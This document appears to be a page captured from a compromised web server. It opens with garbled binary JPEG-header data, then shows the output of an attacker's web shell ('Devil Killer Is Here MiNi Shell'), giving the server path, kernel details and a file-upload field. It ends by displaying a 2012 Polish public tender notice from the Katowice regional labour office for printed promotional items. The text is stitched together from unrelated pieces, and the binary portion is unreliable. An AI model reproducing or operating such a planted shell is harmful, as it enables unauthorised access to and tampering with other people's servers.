JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120904/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120904/190479-N-2012.html

<p class="kh_header"><b>Katowice: DOSTAWA MATERIAŁÓW PROMOCYJNYCH I INFORMACYJNYCH, GADŻETÓW 
ORAZ MATERIAŁÓW EKSPOZYCYJNYCH Z NADRUKIEM</b><br>
<b>Numer ogłoszenia: 190479 - 2012; data zamieszczenia: 04.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW PROMOCYJNYCH I INFORMACYJNYCH, GADŻETÓW 
ORAZ MATERIAŁÓW EKSPOZYCYJNYCH Z NADRUKIEM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów promocyjnych i informacyjnych, gadżetów oraz materiałów ekspozycyjnych z nadrukiem promującym Program Operacyjny Kapitał Ludzki oraz Europejski Fundusz Społeczny.
 
Szczegółowy opis przedmiotu zamówienia:

1.1 	Zestaw karteczek samoprzylepnych typu REMIND ME - 
	kartki samoprzylepne w zamykanym etui wykonanym z czarnego pcv, zawartość: 2 bloczki samoprzylepne karteczek większych o różnych wymiarach (minimum 30 x 40 mm) w podziale 1/3 i 2/3 oraz 8 bloczków samoprzylepnych wąskich karteczek w kształcie strzałki w 8 różnych jaskrawych kolorach. Na etui logo Programu Operacyjnego Kapitał Ludzki i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Śląskie. Pozytywna Energia oraz adres strony internetowej wykonane w technice drukowanej, także inne elementy jak np. dane teleadresowe (wskazane podczas realizacji zamówienia). Pakowane po 20 - 50 szt. Ilość - 250 szt.

1.2 	Kartki MEMO w formie książeczkowej - 
	kartki samoprzylepne w etui wykonanym z grubego kartonu, zamykanym w formie książeczki, lakierowana okładka opatrzona grafiką, zawartość: 1 bloczek samoprzylepnych karteczek koloru białego z nadrukiem (4+0) 101x75 mm +/- 5%, 1 bloczek samoprzylepnych karteczek koloru białego z nadrukiem (4+0) 50x75 mm +/- 5% oraz 5 bloczków karteczek o szerokości 12 mm x 45 mm +/- 5% w pięciu różnych jaskrawych kolorach innych niż kolor większych karteczek. Na okładce oraz większych karteczkach logo Programu Operacyjnego Kapitał Ludzki i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Śląskie. Pozytywna Energia oraz adres strony internetowej wykonane w technice drukowanej, także inne elementy, jak np. dane teleadresowe (wskazane podczas realizacji zamówienia). Pakowane po 20 - 50 szt. Ilość - 500 szt.

1.3    Reklamowa torba papierowa - 
wykonana z papieru białego lub kremowego ekologicznego, gładkiego o gramaturze co najmniej 160 g/m2, uchwyt ze sznurka w kolorze wiodącym w projekcie graficznym torby, wzmocniony od środka tekturką na dnie i uchwytach, wielkość (sz. x gł. x wys.) 250 x 100 x 350 mm +/- 10%. Projekt graficzny torby w kolorystyce 4+0 - do akceptacji przez Zamawiającego. Elementy drukowane w maksimum 10% powierzchni pokryte lakierem UV - do uzgodnienia z Zamawiającym. Pakowane zbiorczo po 50 szt. Ilość - 500 szt.

1.4 	Ekologiczna torba na ramię -  
	Wymiary: 34x28,5x9cm (+ -3) cm dla każdego wymiaru,
	Materiał: Polyester/PET - torba wykonana z przetopionych na włókna butelek po napojach (torba przyjazna środowisku),
	Parametry techniczne : Torba z minimum dwiema kieszeniami wewnętrznymi krytymi klapą na magnetyczne zapięcie oraz zewnętrzną kieszenią na tylnej ściance. Kieszeń wewnętrzna z możliwością umieszczenia laptopa 15,4 cali zamykana na suwak. W kieszeni wewnętrznej znajdują się dodatkowe wydzielone miejsca na dokumenty i drobiazgi takie jak telefon komórkowy, długopisy, wizytówki, z przynajmniej jedną przegrodą zamykaną na suwak oraz uchwyt na klucze. Na klapie torby kieszeń zamykana na suwak. Pasek torby z możliwością regulacji w kolorze czarnym.
Metoda nadruku: termo transfer,
Kolor torby: granatowy/szafir.
Wykonawca umieści na klapie torby w sposób trwały, w wersji kolorowej znaki: logo Programu Operacyjnego Kapitał Ludzki i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Śląskie. Pozytywna Energia oraz adres strony internetowej wykonane w technice drukowanej, także inne elementy jak np. dane teleadresowe (wskazane podczas realizacji zamówienia). Pakowane po 20 - 50 szt. Ilość - 500 szt.

1.5    EKOLOGICZNY KOŁONOTES - 
Wymiary: 29,8x22,0x1,5 cm (+- 0,5) cm dla każdego wymiaru,
Materiał: papier z recyklingu,
Kartki kołonotesu: papier offsetowy w kratkę lub linię, gramatura min. 80g (+-5) g/m2 (min. 60 kartek),
Szycie sprężyną / spiralą wzdłuż dłuższego lewego brzegu (parametry sprężyny / spirali do akceptacji Zamawiającego),
Okładka kołonotesu: karton,
Rodzaj nadruku: tampondruk,
Kolor: beżowy.
	Ilość: 500 szt. (pakowane po 20 - 50 szt.)
Wykonawca umieści w sposób trwały, w wersji kolorowej znaki na:
1. Okładce tytułowej kołonotesu:
Logo Programu Operacyjnego Kapitał Ludzki i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Śląskie. Pozytywna Energia oraz adres strony internetowej wykonane w technice drukowanej, także inne elementy jak np. dane teleadresowe (wskazane podczas realizacji zamówienia). 
2. Kartkach kołonotesu (w górnej części):
Logo Programu Operacyjnego Kapitał Ludzki i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Śląskie. Pozytywna Energia oraz adres strony internetowej wykonane w technice drukowanej, także inne elementy jak np. dane teleadresowe (wskazane podczas realizacji zamówienia). 
3. Kartkach kołonotesu (w dolnej części):
Logo Programu Operacyjnego Kapitał Ludzki i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Śląskie. Pozytywna Energia oraz adres strony internetowej wykonane w technice drukowanej, także inne elementy jak np. dane teleadresowe (wskazane podczas realizacji zamówienia). 
4. Okładce końcowej kołonotesu:
	Logo Programu Operacyjnego Kapitał Ludzki i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Śląskie. Pozytywna Energia oraz adres strony internetowej wykonane w technice drukowanej, także inne elementy jak np. dane teleadresowe (wskazane podczas realizacji zamówienia).

1.6 	Długopis metalowy - 
typ STAR lub równoważny wykonany z matowego metalu z elementami chromowanymi, w kolorze granatowym i pomarańczowym (wersje kolorystyczne w równej ilości sztuk) wyposażony w przyciskowy mechanizm wysuwania wkładu ze zintegrowanym uchwytem - przycisk w kolorze długopisu, uchwyt chromowany, grubość linii pisma 0,3-0,5 mm, długopis nie krótszy niż 130 mm i nie dłuższy niż 150 mm, grubość bez uchwytu max 11 mm, wkład wymienny koloru niebieskiego, dwa okalające długopis grawery na części chwytu długopisu (w postaci pierścieni okalających długopis wygiętych w strzałkę w górnej części), nadruk w technice laserowej, kolorystyka nadruku 1+0, obejmujący logo Programu Operacyjnego Kapitał Ludzki, flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny i logo Śląskie. Pozytywna Energia po jednej stronie korpusu oraz adres strony internetowej WUP po drugiej stronie korpusu - projekt graficzny do akceptacji przez Zamawiającego. Każdy długopis zapakowany w osobnej folii. Pakowane zbiorczo po minimum 40 szt. w kartonowych pudełkach, Ilość: 2000 szt.

1.7	Opaska Samozaciskowa odblaskowa - 
Blaszka samozaciskowa zalaminowana odblaskową folią mikropryzmatyczną posiadającą właściwości fluoroscencyjno-odblaskowe. W części spodniej posiada materiał typu flock w kolorze czarnym. Kolor taśmy odblaskowej: pomarańczowy   lub w kolorze żółtym. Wielkość (+/- 10%): 340 mm x 30 mm x min 1 mm. Metoda nadruku (tampondruk, nadruk jednostronny). Gwarancja producenta oraz Wykonawcy zamówienia na wszystkie elementy produktu nie krótsza niż 24 miesiące - Wykonawca pokrywa również koszty transportu w przypadku ewentualnych reklamacji. Nadruk w technice trwałej (do akceptacji przez Zamawiającego) zawierający logo Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Programu Operacyjnego Kapitał Ludzki, adres strony internetowej Wojewódzkiego Urzędu Pracy oraz Śląskie. Pozytywna energia po obydwu szerokich stronach karty, projekt graficzny nadruków do akceptacji przez Zamawiającego. Ilość: 500 sztuk. (pakowane po 100 sztuk w zbiorczym opakowaniu kartonowym).

1.8 	Zestaw piśmienniczy - 
Komplet piśmienniczy składający się z długopisu i pióra kulkowego w ozdobnym etui; długopis z metalową srebrną końcówką, pierścieniem i klipsem, korpus metalowy w kolorze czarnym, pióro kulkowe z zakrętką metalową, w kolorze srebrnym końcówką i pierścieniem oraz klipsem i pierścieniem na zakrętce, korpus pióra metalowy w kolorze czarnym; etui z ekoskóry w kolorze czarnym z przeszyciami jasną nitką na obrzeżach, wewnątrz dwa zaczepy na pióro i długopis, zamykane w sposób kopertowy zaczepem na zewnątrz. Ilość - 100,00 sztuk

1.9  	Zestaw piśmienniczy - 
Komplet piśmienniczy składający się z metalowego pióra i metalowego długopisu w kolorze  srebrnym i czarnym ( 50 kompletów srebrnych, 50 czarnych). Długopis z niebieskim wkładem, pióro z niebieskim nabojem. Opakowane w zamykanym plastikowym etui z atłasowym białym wnętrzem. Nadruk w technice laserowej lub  wyraźnego tampodruku (technika zostanie określona podczas realizacji zamówienia), kolorystyka nadruku 1+0 obejmująca logo Programu Operacyjnego kapitał Ludzki i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, po jednej stronie korpusu oraz adres strony internetowej WUP po drugiej stronie korpusu - projekt do akceptacji przez Zamawiającego. Na etui logo Programu Operacyjnego kapitał Ludzki i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Śląskie pozytywna energia oraz adres strony internetowej WUP - projekt do akceptacji przez Zamawiającego, technika nadruku uzależniona od typu wykorzystanego etui. Zapakowane w osobnych foliach. Ilość - 100 sztuk, pakowane zbiorczo po min. 10 sztuk w kartonowych pudełkach.

1.10 	Zawieszka - zapach samochodowy - 
Zawieszka zapach samochodowy, kolor biały lub kremowy z nadrukiem (5 kolorów wyposażony w gumkę do zawieszenia produktu. Materiał grubości nie mniejszej niż 2 mm - sztywny odporny na zniszczenie, Atest PZH, średnica nie mniejsza niż 75mm, indywidualny kształt zawieszki ustalony z Zamawiającym. Opakowane - każda zawieszka zapakowana w szczelny woreczek z folii barierowej. Na woreczku umieszczony nadruk ostrzegawczy. Zapachy zawieszki: waniliowy, drzewo sandałowe, werbena, dostarczone w równych proporcjach.  Nadruk w technice laserowej lub  wyraźnego tampodruku (technika zostanie określona podczas realizacji zamówienia), kolorystyka nadruku 1+0 obejmująca logo Programu Operacyjnego kapitał Ludzki i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, po jednej stronie oraz adres strony internetowej WUP po drugiej stronie  - projekt do akceptacji przez Zamawiającego. Zapakowane w osobnych foliach. Ilość - 1500 sztuk, pakowane zbiorczo po min. 100 sztuk w kartonowych pudełkach.

1.11 	Brelok do telefonu drewniany ekologiczny (kulka) - 
	Całość wykonana z ekologicznego drewna (kolor jasny brąz). Brelok zakończony z jednej strony odłączanym - przekręcanym kółkiem umożliwiającym jego przyczepienie do np. szlufki, a z drugiej strony ruchomym kółkiem na klucze umocowanym do części środkowej breloka za pomocą przedłużki w kształcie walca. Wymiary breloka: średnica 23 mm +/- 5 %. 
	Gwarancja producenta oraz Wykonawcy zamówienia na wszystkie elementy produktu nie krótsza niż 24 miesiące - Wykonawca pokrywa również koszty transportu w przypadku ewentualnych reklamacji. Nadruk w technice trwałej (do akceptacji przez Zamawiającego) zawierający logo Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Programu Operacyjnego Kapitał Ludzki, adres strony internetowej Wojewódzkiego Urzędu Pracy oraz Śląskie. Pozytywna energia po obydwu szerokich stronach karty, projekt graficzny nadruków do akceptacji przez Zamawiającego. Wielkość nadruku: 12x12mm - wykonany techniką laserową. Ilość: 500 sztuk pakowane zbiorczo po min. 50 sztuk w kartonowych pudełkach.

1.12  Pamięć USB, o pojemności 8 GB plastik -  
Obudowa wykonana z plastiku w kształcie spłaszczonej elipsy. Zamknięcie typu scyzoryk tj. metalowa końcówka pendriva zamykana plastikową osłoną przytwierdzoną do tej części. Obudowa pendriva z w kolorze granatowym, zamkniecie w kolorze srebrnym. 
Rozmiar: 5,7 x 2 x 1,2 cm (+/- 5 %)
	Gwarancja producenta oraz Wykonawcy zamówienia na wszystkie elementy produktu nie krótsza niż 12 miesięcy. Wykonawca pokrywa również koszty transportu w przypadku ewentualnych reklamacji. Nadruk jednokolorowy wykonany w technice trwałej w technice trwałej (do akceptacji przez Zamawiającego) zawierający logo Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Programu Operacyjnego Kapitał Ludzki, po obydwu szerokich stronach USB, projekt graficzny nadruków do akceptacji przez Zamawiającego. Ilość: 200 sztuk.

1.13  Tablica korkowa - 
	Tablica z powierzchnią korkową. Rama z drewnianej sklejki. Możliwość zawieszenia w pionie i poziomie. W komplecie elementy mocujące. Wymiary: 60 x 100 cm. Ilość: 3 sztuki.

1.16 	Plakaty -  
A3 druk 4+0 papier kredowany 170 gr/m2, kolor 4+4 CMYK tzw. ślepe plakaty (z miejscem na odręczny napis) służące do oznaczania m.in. sal szkoleniowych podczas spotkań informacyjnych, stoisk targowych, wystawienniczych itp. Plakat oznaczony logotypami PO KL, UE, Śląskie - pozytywna energia, WUP oraz informacją o współfinansowaniu. Przygotowanie projektu plakatu uwzględnione w cenie usługi. Ilość: 50 sztuk.

Uwagi ogólne:
- Logotypy oraz treść informacji umieszczonych na projektach graficznych Zamawiający przekaże 
w wersji elektronicznej, dostarczone przez Zamawiającego w dniu podpisania umowy.
- Skład DTP materiałów drukowanych wraz z projektami graficznymi jest uwzględniony w cenie usługi, 
a przed drukiem musi być dostarczony do akceptacji przez Zamawiającego.
- W przypadku technicznej niemożliwości zastosowania w poszczególnych pozycjach wszystkich wymaganych w nich logotypów, Zamawiający zastrzega sobie prawo do modyfikacji ich ilości.
- Wykonawca udziela Zamawiającemu bezterminowej licencji na wykorzystanie użytych w materiałach form graficznych na nieograniczonych polach eksploatacji, przekaże również pliki w formie multimedialnej utworzonych layoutów w formacie. .cdr (wersja programu 12) lub .ai (wersja programu CS3).
- Wykonawca przedstawi wzory wykonanych materiałów i gadżetów w formacie PDF do akceptacji Zamawiającego. Zamawiający w terminie 5 dni roboczych od ich otrzymania dokona akceptacji przedstawionych przez Wykonawcę wzorów materiałów i gadżetów, bądź naniesienie ewentualne uwagi, które Wykonawca zobowiązany jest uwzględnić w całości.
- Zamówione gadżety dostarczone do siedziby Zamawiającego na koszt Wykonawcy w dni robocze od poniedziałku do piątku w godzinach od 8.00 - 14.00.
- Po stronie Wykonawcy leżeć będzie sporządzeni i dostarczeni wraz z zamówionymi gadżetami protokołu zdawczo - odbiorczego w dwóch egzemplarzach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w/w warunku, jeżeli Wykonawca wykaże, 
iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, 
a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie 1 dostawę o wartości nie mniejszej niż 35 000,00 zł, odpowiadającą swoim rodzajem przedmiotowi zamówienia.

	Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia w/w warunku według formuły spełnia/nie spełnia na podstawie załączonego do oferty wykazu zawierającego dostawę wykonaną w okresie ostatnich trzech lat przed upływem terminu składania ofert bądź wykonywaną nadal, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającą swoim rodzajem przedmiotowi zamówienia, z podaniem nazwy jednostki, dla której była lub jest wykonywana, datą jej realizacji, wartości oraz załączeniem dokumentu lub dokumentów potwierdzających, że dostawa wymieniona w wykazie została wykonana lub jest wykonywana należycie (np. referencje). 

Dokument lub dokumenty potwierdzające należyte wykonanie powinny zostać przedstawione w formie oryginału lub czytelnej kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do występowania w imieniu Wykonawcy.

Nie wykazanie spełnienia w/w warunku skutkować będzie wykluczeniem Wykonawcy 
z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach
ul. Kościuszki 30
pok. 304- 305 III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2012 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Katowicach
ul. Kościuszki 30
pok.210 II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




